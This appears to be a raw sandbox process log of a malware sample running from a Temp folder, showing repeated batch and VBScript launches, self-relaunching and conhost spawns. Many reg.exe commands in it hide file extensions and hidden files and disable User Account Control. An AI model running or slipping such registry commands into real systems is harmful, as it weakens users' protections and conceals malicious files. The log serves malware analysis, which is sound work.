cmd /c ""C:\Users\Admin\AppData\Local\Temp\oOwEwYso.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UuAkogwQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\iEkgUMUQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BOYQEYsI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vYYIQAsQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\HUsAUQsw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VyoAQUoc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\iOYoUMIY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\cigQccko.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UQkcQssI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KAUsUskY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jOwoMkAg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VWYIsEwE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\PGAIUsQM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-440999511-1155300936181164591210668703835374953-1370716411-1392040357-1182375777"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UKowIkEI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\aIocUkYY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1531978821-170153260441454644-1568343422-234136477-1549663008-17192498081069427790"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wKsYMUQM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\iUwgcAAk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-562610642-1012686143-1823529821627534025573683888937657951109441090-1434522835"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VQMMUUII.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1684412327-76320201816065152608441403622103630331205356645569190144611771160"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-4434012343984981381663635953966065408187333917174603648320520853211795173721"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\FmgcYowI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "14838520339525129391306933750-15531957801929914349-14278369881917251631-1761057869"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BOQsEoMs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "989972481691039484-1439563656-17970014547512975433404416981966436671-1960887852"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vMgMkAkY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-116314391292071513-963266584164256776018708505581588814441144782848-1730487192"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1577704050-1683544744-770769748616314146131678904120556107641232260824-4495685"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

